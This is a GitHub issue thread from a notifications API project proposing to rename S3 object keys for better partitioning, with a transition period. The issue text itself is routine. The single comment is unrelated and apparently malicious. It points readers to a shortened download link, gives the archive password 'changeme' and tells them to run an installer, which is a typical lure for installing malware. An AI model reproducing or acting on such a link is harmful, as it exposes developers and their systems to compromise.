### ISSUE TITLE
Optimize S3 partitioning

### ISSUE THREAD

**Issue by terrazoon** [GSA/notifications-api#1299]
Right now we are storing s3 files in the bucket with names that start "service-<service guid>-notify".

However, due to the internal workings of s3 this results in us having only one 'partition' because partitions are based on the first few characters in the name of the object.

To optimize for GA, we should change the format to "<service guid>-service-notify", which will help with scalability.   We will have to go through a 7 day transitional period where both forms are acceptable.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
